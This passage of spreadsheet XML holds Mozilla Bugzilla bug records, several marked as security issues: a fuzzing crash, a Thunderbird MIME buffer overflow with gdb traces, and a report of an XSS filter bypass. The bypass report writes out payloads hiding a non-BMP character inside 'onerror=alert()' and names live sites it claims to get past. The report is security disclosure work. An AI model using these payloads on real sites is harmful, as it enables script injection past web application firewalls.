LD=ld CROSS_COMPILE=1 CC="clang -Qunused-arguments -msse2 -mfpmath=sse -arch i386" RANLIB=ranlib CXX="clang++ -Qunused-arguments -msse2 -mfpmath=sse -arch i386" AS=$CC AR=ar STRIP="strip -x -S" HOST_CC="clang -Qunused-arguments -msse2 -mfpmath=sse" AUTOCONF=/usr/local/Cellar/autoconf213/2.13/bin/autoconf213 HOST_CXX="clang++ -Qunused-arguments -msse2 -mfpmath=sse" sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=i386-apple-darwin9.2.0 --enable-macos-target=10.5 --enable-debug --enable-optimize --enable-nspr-build --enable-more-deterministic --with-ccache --enable-gczeal --enable-debug-symbols --disable-tests
This was found by combining random js tests together with jsfunfuzz, the specific file(s) is/are:
http://hg.mozilla.org/mozilla-central/file/490f124d7dea/js/src/jit-test/tests/auto-regress/bug812235.js
http://hg.mozilla.org/mozilla-central/file/490f124d7dea/js/src/tests/test262/ch07/7.8/7.8.5/S7.8.5_A2.1_T2.js
http://hg.mozilla.org/mozilla-central/file/490f124d7dea/js/src/jit-test/tests/debug/bug-826669.js
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   https://hg.mozilla.org/mozilla-central/rev/a57b5d713883
parent:      213775:4e0a21777c55
user:        Terrence Cole
date:        Wed Oct 29 14:17:45 2014 -0700
summary:     Bug 1074961 - Part 11: Use a ChunkPool to manage available Chunks list; r=sfink
Setting s-s because this seems to involve gcslice and gczeal.
Terrence, is bug 1074961 a likely regressor?</t>
        </is>
      </c>
      <c r="X5686" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5687">
      <c r="A5687" t="n">
        <v>967341</v>
      </c>
      <c r="B5687" t="inlineStr">
        <is>
          <t>2014-02-03 18:30:05 -0800</t>
        </is>
      </c>
      <c r="C5687" t="inlineStr">
        <is>
          <t>"ASSERTION: index exceeds allowable range" - nsStandardURL::Host</t>
        </is>
      </c>
      <c r="D5687" t="inlineStr">
        <is>
          <t>2015-02-25 21:53:28 -0800</t>
        </is>
      </c>
      <c r="E5687" t="n">
        <v>1</v>
      </c>
      <c r="F5687" t="n">
        <v>1</v>
      </c>
      <c r="G5687" t="n">
        <v>3</v>
      </c>
      <c r="H5687" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5687" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5687" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5687" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5687" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5687" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5687" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5687" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5687" t="inlineStr">
        <is>
          <t>[fuzzblocker][adv-main28+][adv-esr24.4+]</t>
        </is>
      </c>
      <c r="Q5687" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5687" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5687" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T5687" t="n">
        <v>1</v>
      </c>
      <c r="U5687" t="n">
        <v>0</v>
      </c>
      <c r="V5687" t="n">
        <v>30</v>
      </c>
      <c r="W5687" t="inlineStr">
        <is>
          <t>Created attachment 8369820
testcase
###!!! ASSERTION: index exceeds allowable range: 'i &lt;= mLength', file nsTString.h
&gt;    frame #0: 0x0000000101622ddb XUL`nsCString::CharAt(this=0x000000012505b540, i=4294967295) const + 91 at nsTString.h:105
&gt;    frame #1: 0x00000001017d2efb XUL`nsStandardURL::Host(this=0x000000012505b500) + 91 at nsStandardURL.h:352
&gt;    frame #2: 0x00000001017c0048 XUL`nsStandardURL::GetHost(this=0x000000012505b500, result=0x00007fff5fbf6c68) + 40 at nsStandardURL.cpp:1016
&gt;    frame #3: 0x000000010332d17e XUL`mozilla::dom::URL::GetHostname(this=0x00000001262ffc70, aHostname=0x00007fff5fbf6d18) const + 126 at URL.cpp:334
&gt;    frame #4: 0x0000000102d7ffae XUL`mozilla::dom::URLBinding::get_hostname(cx=0x000000011f8c3e70, obj=Handle&lt;JSObject *&gt; at 0x00007fff5fbf6de0, self=0x00000001262ffc70, args=JSJitGetterCallArgs at 0x00007fff5fbf6dd0) + 94 at URLBinding.cpp:622</t>
        </is>
      </c>
      <c r="X5687" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5688">
      <c r="A5688" t="n">
        <v>1584170</v>
      </c>
      <c r="B5688" t="inlineStr">
        <is>
          <t>2019-09-26 05:31:33 -0700</t>
        </is>
      </c>
      <c r="C5688" t="inlineStr">
        <is>
          <t>Access heap-allocated array with index out of bounds in `nsPlainTextSerializer`</t>
        </is>
      </c>
      <c r="D5688" t="inlineStr">
        <is>
          <t>2020-06-05 00:28:14 -0700</t>
        </is>
      </c>
      <c r="E5688" t="n">
        <v>1</v>
      </c>
      <c r="F5688" t="n">
        <v>1</v>
      </c>
      <c r="G5688" t="n">
        <v>3</v>
      </c>
      <c r="H5688" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5688" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5688" t="inlineStr">
        <is>
          <t>DOM: Serializers</t>
        </is>
      </c>
      <c r="K5688" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5688" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5688" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5688" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5688" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5688" t="inlineStr">
        <is>
          <t>[adv-main71+][adv-esr68.3+]</t>
        </is>
      </c>
      <c r="Q5688" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5688" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5688" t="inlineStr">
        <is>
          <t>mozilla72</t>
        </is>
      </c>
      <c r="T5688" t="n">
        <v>1</v>
      </c>
      <c r="U5688" t="n">
        <v>0</v>
      </c>
      <c r="V5688" t="n">
        <v>41</v>
      </c>
      <c r="W5688" t="inlineStr">
        <is>
          <t>`mOLStackIndex - 1 ` may exceed `OLStackSize` (https://searchfox.org/mozilla-central/rev/f43ae7e1c43a4a940b658381157a6ea6c5a185c1/dom/base/nsPlainTextSerializer.cpp#779).
I'll attach a review with a unit-test demonstrating it.
It's unclear if the code-path can be reached in Gecko code, because it depends on `nsIDocumentEncoder::OutputFormatted`. It's likely to be reachable in Thunderbird.</t>
        </is>
      </c>
      <c r="X5688" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5689">
      <c r="A5689" t="n">
        <v>1382898</v>
      </c>
      <c r="B5689" t="inlineStr">
        <is>
          <t>2017-07-20 17:52:49 -0700</t>
        </is>
      </c>
      <c r="C5689" t="inlineStr">
        <is>
          <t>Disable the Stop / Reload animation if the stop / reload buttons are placed outside of the nav-bar</t>
        </is>
      </c>
      <c r="D5689" t="inlineStr">
        <is>
          <t>2017-09-05 18:53:42 -0700</t>
        </is>
      </c>
      <c r="E5689" t="n">
        <v>1</v>
      </c>
      <c r="F5689" t="n">
        <v>1</v>
      </c>
      <c r="G5689" t="n">
        <v>2</v>
      </c>
      <c r="H5689" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5689" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5689" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K5689" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5689" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5689" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5689" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5689" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5689" t="inlineStr">
        <is>
          <t>[reserve-photon-animation]</t>
        </is>
      </c>
      <c r="Q5689" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5689" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5689" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T5689" t="n">
        <v>1</v>
      </c>
      <c r="U5689" t="n">
        <v>0</v>
      </c>
      <c r="V5689" t="n">
        <v>17</v>
      </c>
      <c r="W5689" t="inlineStr">
        <is>
          <t>Bug 1363485 will be adding the capability for moving the stop/reload button to an arbitrary location. However due to bug 1382894 we cannot run our animations outside of the nav-bar.
This bug is on file to disable the animations for the stop/reload button if they are not in the nav-bar.</t>
        </is>
      </c>
      <c r="X5689" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5690">
      <c r="A5690" t="n">
        <v>895783</v>
      </c>
      <c r="B5690" t="inlineStr">
        <is>
          <t>2013-07-19 00:51:32 -0700</t>
        </is>
      </c>
      <c r="C5690" t="inlineStr">
        <is>
          <t>Intermittent jetpack tests/test-places-host.testTagsUntag | no extra tags - 2 == 4</t>
        </is>
      </c>
      <c r="D5690" t="inlineStr">
        <is>
          <t>2013-11-06 12:19:56 -0800</t>
        </is>
      </c>
      <c r="E5690" t="n">
        <v>1</v>
      </c>
      <c r="F5690" t="n">
        <v>1</v>
      </c>
      <c r="G5690" t="n">
        <v>6</v>
      </c>
      <c r="H5690" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5690" t="inlineStr">
        <is>
          <t>Add-on SDK Graveyard</t>
        </is>
      </c>
      <c r="J5690" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5690" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5690" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5690" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5690" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5690" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5690" t="inlineStr"/>
      <c r="Q5690" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5690" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5690" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5690" t="n">
        <v>1</v>
      </c>
      <c r="U5690" t="n">
        <v>0</v>
      </c>
      <c r="V5690" t="n">
        <v>6</v>
      </c>
      <c r="W5690" t="inlineStr">
        <is>
          <t>https://tbpl.mozilla.org/php/getParsedLog.php?id=25454054&amp;tree=UX
Looks like:
TEST-PASS | tests/test-places-host.testTagsUntag | first tag persisted
TEST-PASS | tests/test-places-host.testTagsUntag | second tag persisted
TEST-PASS | tests/test-places-host.testTagsUntag | first tag removed
TEST-PASS | tests/test-places-host.testTagsUntag | second tag removed
TEST-UNEXPECTED-FAIL | tests/test-places-host.testTagsUntag | no extra tags - 2 == 4
TEST-INFO | Traceback (most recent call last):
  File "resource://gre/modules/commonjs/sdk/timers.js", line 31, in notify
    callback.apply(null, args);
  File "resource://gre/modules/commonjs/sdk/lang/functional.js", line 66, in invoke
    function invoke(callee, params, self) callee.apply(self, params);
  File "resource://gre/modules/commonjs/sdk/addon/events.js", line 27, in null
    else request.resolve(clone(data));
  File "resource://gre/modules/commonjs/sdk/core/promise.js", line 189, in resolve
    result.then(observer.resolve, observer.reject);
  File "resource://gre/modules/commonjs/sdk/core/promise.js", line 47, in then
    return { then: function then(fulfill) { fulfill(value); } };
  File "resource://gre/modules/commonjs/sdk/core/promise.js", line 122, in resolve
    deferred.resolve(onFulfill ? onFulfill(value) : value);
  File "resource://gre/modules/commonjs/sdk/core/promise.js", line 122, in resolve
    deferred.resolve(onFulfill ? onFulfill(value) : value);
  File "resource://extensions.modules.9e845e9f-ba7a-4618-82ca-c29cad17c091-at-jetpack.commonjs.path.tests/test-places-host.js", line 173, in exports.testTagsUntag/&lt;
    assert.equal(tags.length, 2, 'no extra tags');
  File "resource://gre/modules/commonjs/sdk/test/assert.js", line 125, in equal
    operator: "=="
  File "resource://gre/modules/commonjs/sdk/test/assert.js", line 89, in fail
    this._log.fail(message);
  File "resource://gre/modules/commonjs/sdk/deprecated/unit-test.js", line 84, in fail
    this.console.testMessage(false, false, this.test.name, message);
  File "resource://gre/modules/commonjs/sdk/test/harness.js", line 523, in testMessage
    this.trace();
TEST-END | tests/test-places-host.testTagsUntag</t>
        </is>
      </c>
      <c r="X5690" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5691">
      <c r="A5691" t="n">
        <v>458968</v>
      </c>
      <c r="B5691" t="inlineStr">
        <is>
          <t>2008-10-07 15:08:15 -0700</t>
        </is>
      </c>
      <c r="C5691" t="inlineStr">
        <is>
          <t>Firefox Mac Beta 1 candidate build is branded "Minefield"</t>
        </is>
      </c>
      <c r="D5691" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5691" t="n">
        <v>1</v>
      </c>
      <c r="F5691" t="n">
        <v>1</v>
      </c>
      <c r="G5691" t="n">
        <v>5</v>
      </c>
      <c r="H5691" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5691" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5691" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5691" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5691" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5691" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5691" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5691" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5691" t="inlineStr"/>
      <c r="Q5691" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5691" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5691" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5691" t="n">
        <v>1</v>
      </c>
      <c r="U5691" t="n">
        <v>0</v>
      </c>
      <c r="V5691" t="n">
        <v>9</v>
      </c>
      <c r="W5691" t="inlineStr">
        <is>
          <t>I have downloaded the build from ftp://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/3.1b1-candidates/build1/ on two separate Mac machines and it is branded with Minefield instead of Firefox.</t>
        </is>
      </c>
      <c r="X5691" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5692">
      <c r="A5692" t="n">
        <v>1412565</v>
      </c>
      <c r="B5692" t="inlineStr">
        <is>
          <t>2017-10-28 14:24:56 -0700</t>
        </is>
      </c>
      <c r="C5692" t="inlineStr">
        <is>
          <t>Crash in webrender_bindings::bindings::wr_dec_ref_arc</t>
        </is>
      </c>
      <c r="D5692" t="inlineStr">
        <is>
          <t>2017-11-05 13:59:32 -0800</t>
        </is>
      </c>
      <c r="E5692" t="n">
        <v>1</v>
      </c>
      <c r="F5692" t="n">
        <v>1</v>
      </c>
      <c r="G5692" t="n">
        <v>3</v>
      </c>
      <c r="H5692" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5692" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5692" t="inlineStr">
        <is>
          <t>Graphics: WebRender</t>
        </is>
      </c>
      <c r="K5692" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5692" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5692" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5692" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5692" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5692" t="inlineStr">
        <is>
          <t>[wr-mvp]</t>
        </is>
      </c>
      <c r="Q5692" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5692" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5692" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T5692" t="n">
        <v>1</v>
      </c>
      <c r="U5692" t="n">
        <v>0</v>
      </c>
      <c r="V5692" t="n">
        <v>7</v>
      </c>
      <c r="W5692" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-cd16416f-339f-40ab-8acf-92c930171028.
=============================================================
This started in the latest Nightly. Hard to track down the issue via mozregression since it can take a while to happen. 
31:10.48 INFO: Got as far as we can go bisecting nightlies...
31:10.48 INFO: Last good revision: d58424c244c38f88357a26fb61c333d3c6e552d7 (2017-10-27)
31:10.48 INFO: First bad revision: c16bc8097c102cdd2b70d8e7db3656222455a6ed (2017-10-28)
31:10.48 INFO: Pushlog:
https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=d58424c244c38f88357a26fb61c333d3c6e552d7&amp;tochange=c16bc8097c102cdd2b70d8e7db3656222455a6ed</t>
        </is>
      </c>
      <c r="X5692" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5693">
      <c r="A5693" t="n">
        <v>362735</v>
      </c>
      <c r="B5693" t="inlineStr">
        <is>
          <t>2006-12-04 08:29:38 -0800</t>
        </is>
      </c>
      <c r="C5693" t="inlineStr">
        <is>
          <t>2 problems in MimeRichtextConvert</t>
        </is>
      </c>
      <c r="D5693" t="inlineStr">
        <is>
          <t>2008-07-31 04:30:00 -0700</t>
        </is>
      </c>
      <c r="E5693" t="n">
        <v>1</v>
      </c>
      <c r="F5693" t="n">
        <v>1</v>
      </c>
      <c r="G5693" t="n">
        <v>3</v>
      </c>
      <c r="H5693" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5693" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J5693" t="inlineStr">
        <is>
          <t>MIME</t>
        </is>
      </c>
      <c r="K5693" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5693" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5693" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5693" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5693" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5693" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q5693" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5693" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5693" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5693" t="n">
        <v>1</v>
      </c>
      <c r="U5693" t="n">
        <v>0</v>
      </c>
      <c r="V5693" t="n">
        <v>16</v>
      </c>
      <c r="W5693" t="inlineStr">
        <is>
          <t>2 problems in MimeRichtextConvert 
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/mailnews/mime/src/mimetric.cpp&amp;rev=1.16
106 seawood  1.13   // The code below must never expand the input by more than 5x;
107 mstoltz  1.12   // if it does, the desired_size multiplier (5) below must be changed too
108                 [1] desired_size = (length * 5) + 1;
109 rhp      1.1    [2] if (desired_size &gt;= *obuffer_sizeP)
110               	status = mime_GrowBuffer (desired_size, sizeof(char), 1024,
111               							 obufferP, obuffer_sizeP);
so 2 problems:
A) |desired_size| may be negative even on 32 bit systems at the cost of 
1.8G VM (~ 425M length).
the check at [2] is useless in this case.
B) on 64 bit systems [1] may overflow at the cost of about 3.6G VM 
(~ 850M length). this may work in theory on 32 bit systems, but could reproduce it only on a 64 bit system.
stack from the negative case:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1223984304 (LWP 4848)]
0xb739ec33 in strcpy () from /lib/i686/libc.so.6
(gdb) bt
#0  0xb739ec33 in strcpy () from /lib/i686/libc.so.6
#1  0xb7cc8311 in PL_strcpy (
    dest=0x8bd7ffd "&amp;am" &lt;Address 0x8bd8000 out of bounds&gt;, 
    src=0xb4c0faa8 "&amp;amp;")
    at /opt/joro/thunderbird20/mozilla/nsprpub/lib/libc/src/strcpy.c:46
#2  0xb4b885c8 in MimeRichtextConvert (
    line=0x70417008 '&amp;' &lt;repeats 200 times&gt;..., length=445644801, 
    output_fn=0xb4b8ad74 &lt;mime_output_fn&gt;, closure=0x8b98020, 
    obufferP=0x8a76e04, obuffer_sizeP=0x8a76e0c, enriched_p=1)
    at /opt/joro/thunderbird20/mozilla/mailnews/mime/src/mimetric.cpp:167
#3  0xb4b89036 in MimeInlineTextRichtext_parse_line (
    line=0x70417008 '&amp;' &lt;repeats 200 times&gt;..., length=445644801, 
(gdb) frame 2
#2  0xb4b885c8 in MimeRichtextConvert (
    line=0x70417008 '&amp;' &lt;repeats 200 times&gt;..., length=445644801, 
    output_fn=0xb4b8ad74 &lt;mime_output_fn&gt;, closure=0x8b98020, 
    obufferP=0x8a76e04, obuffer_sizeP=0x8a76e0c, enriched_p=1)
    at /opt/joro/thunderbird20/mozilla/mailnews/mime/src/mimetric.cpp:167
167                       PL_strcpy (out, "&amp;amp;"); out += strlen (out);
(gdb) x/4c out
0x8bd7ffd:      38 '&amp;'  97 'a'  109 'm' Cannot access memory at address 0x8bd8000
(gdb) x/4c out-20
0x8bd7fe9:      38 '&amp;'  97 'a'  109 'm' 112 '</t>
        </is>
      </c>
      <c r="X5693" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5694">
      <c r="A5694" t="n">
        <v>193442</v>
      </c>
      <c r="B5694" t="inlineStr">
        <is>
          <t>2003-02-14 20:53:22 -0800</t>
        </is>
      </c>
      <c r="C5694" t="inlineStr">
        <is>
          <t>getting the GRE working without LD_LIBRARY_PATH on linux</t>
        </is>
      </c>
      <c r="D5694" t="inlineStr">
        <is>
          <t>2016-06-23 14:32:09 -0700</t>
        </is>
      </c>
      <c r="E5694" t="n">
        <v>1</v>
      </c>
      <c r="F5694" t="n">
        <v>1</v>
      </c>
      <c r="G5694" t="n">
        <v>6</v>
      </c>
      <c r="H5694" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5694" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5694" t="inlineStr">
        <is>
          <t>Embedding: GRE Core</t>
        </is>
      </c>
      <c r="K5694" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5694" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5694" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5694" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5694" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5694" t="inlineStr"/>
      <c r="Q5694" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5694" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5694" t="inlineStr">
        <is>
          <t>mozilla1.4alpha</t>
        </is>
      </c>
      <c r="T5694" t="n">
        <v>1</v>
      </c>
      <c r="U5694" t="n">
        <v>0</v>
      </c>
      <c r="V5694" t="n">
        <v>70</v>
      </c>
      <c r="W5694" t="inlineStr">
        <is>
          <t>This is the holy grail of embedding on Linux.  I would really like to have this
properly working on Linux by 1.3, if possible.
Here's the problem:
Some of the components that we include are linked with various shared libs
(libmozjs.so, libgkgfx.so, etc).  In order for those files to to be
automatically loaded by ld.so when xpcom opens the component shared library, the
library has to be located somewhere in the library path, usually controlled at
least on linux by /etc/ld.so.conf and the LD_LIBRARY_PATH environment variable.
 However, once a program has been started there's no way for that program to
change its library path.  You have to use an explicit dlopen().
Now, given that set of restrictions here are the requirements as I understand
them, or really as I would like to see it done:
1. The location of the GRE on Linux should be runtime configurable.
2. Clients using the GRE should be able to locate the GRE package using a config
file, through the standard rules.
3. No part of the GRE should be included in the library path so that you can
have more than one version of it installed if you want.  (Well, except for nspr
but that's another bug.)
And now some possible solutions:
Doug's approach was to change the value of LD_LIBRARY_PATH at run time after the
GRE has been located.  However, it turns out that the value of that is only
checked once at startup and changing it has no effect.  So we need a new approach.
The solution here requires coming up with a method of using dlopen() to load any
dependent libraries of any components before that component is loaded.  We can't
get the dependency information directly from the shared library because to do so
we would have to open it and trigger the dynamic linker error.  This means that
this information has to be stored outside of the shared library.
I thought it might be possible to store this information in the .xpt files, but
shaver talked me down.  There isn't a clear 1 to 1 relationship between shared
libraries and the .xpt files and besides, .xpt files describe interfaces, not
shared libraries.
We also might install some kind of text file or resource file for each of the
shared libraries that is linked against other libraries, but to me this seems
like a maintenance and installer headache.  The information about linking is
only loosely linked with that shared library.
Another idea that I came up with was to store that information in the shared
library itself, much like we have NSGetModule right now.  If we can guarantee
that LD_LIBRARY_PATH is set during registration (which doesn't seem entirely
unreasonable) we can query the shared library, compile a list of dependencies
and store that information in the registry so that information is available at
run time before any components are loaded.  It also tightly binds the
information to the shared library in question and it is automatically updated
when the shared library is updated.
The last listed here is my personal favorite since it will solve the problem in
an elegant and easy to use manner.
If we do decide to do it this way, there is at least one wrinkle.  We have to
use SONAMEs for the shared libraries.  If you use dlopen() and just load the
shared library without a SONAME, the DT_NEEDED field in the component doesn't
know which shared library you mean and will execute a search, which is what we
want to avoid.  However, if the shared library is linked against a SONAME, not
just a shared library by name the SONAME from the previously loaded shared
library will satisfy the dependency.  No going out to disk, no nothing.
I think we need to do SONAME anyway, so this isn't all bad.  Just a little more
work.</t>
        </is>
      </c>
      <c r="X5694" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5695">
      <c r="A5695" t="n">
        <v>1556230</v>
      </c>
      <c r="B5695" t="inlineStr">
        <is>
          <t>2019-06-02 03:41:22 -0700</t>
        </is>
      </c>
      <c r="C5695" t="inlineStr">
        <is>
          <t>Non-BMP code points that are WhiteSpace/LineTerminator when truncated to char16_t (e.g. U+4000D -&gt; U+000D) should not be considered WhiteSpace</t>
        </is>
      </c>
      <c r="D5695" t="inlineStr">
        <is>
          <t>2024-05-30 09:59:50 -0700</t>
        </is>
      </c>
      <c r="E5695" t="n">
        <v>1</v>
      </c>
      <c r="F5695" t="n">
        <v>1</v>
      </c>
      <c r="G5695" t="n">
        <v>3</v>
      </c>
      <c r="H5695" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5695" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5695" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5695" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5695" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5695" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5695" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5695" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5695" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main68-]</t>
        </is>
      </c>
      <c r="Q5695" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5695" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5695" t="inlineStr">
        <is>
          <t>mozilla69</t>
        </is>
      </c>
      <c r="T5695" t="n">
        <v>1</v>
      </c>
      <c r="U5695" t="n">
        <v>1</v>
      </c>
      <c r="V5695" t="n">
        <v>34</v>
      </c>
      <c r="W5695" t="inlineStr">
        <is>
          <t>Tested On :
- Browser : Firefox Quantum Version 67.0 (64-bit)
- OS : macOS Mojave Version 10.14.5 Beta
Issue:
The character "\uD8C0\uDC0D" is ignored by the JS Parser. So below JS code is executable in Firefox browser.
For Example : 
     񀀍alert񀀍(񀀍) //It is equivalent to alert()
     document񀀍.񀀍domain // It is equivalent to document.domain
Impact: (Security Impact) :
The impact is most of WAF or XSS filters are built on the basis of defined specifications of HTML and Javascript. So it is unlikely to consider the behaviour of "\uD8C0\uDC0D" character while developing any WAF. So this leaves most of existing WAF's vulnerable to XSS even though they are perfectly secure for browsers like Chrome or Safari. I have used this unexpected behaviour of Firefox to bypass few popular WAF's.
	Cloudflare Bypass : https://coinmarketcap.com/?&lt;img%20src=x%20onerror=񀀍alert񀀍()&gt;
	Akamai Bypass : https://www.aliexpress.com/?&lt;img%20src=x%20onerror=񀀍alert񀀍()&gt;
The number of ways this behaviour can be exploited are endless and depends of attackers creativity.
Proof Of Concept: 
1. Open console and type below Payload and see it getting executed without any error.
Payload : 񀀍alert񀀍(񀀍document񀀍.񀀍domain񀀍)   // It should alert "document.domain" property.
2. Save below HTML code and open in Firefox browser :
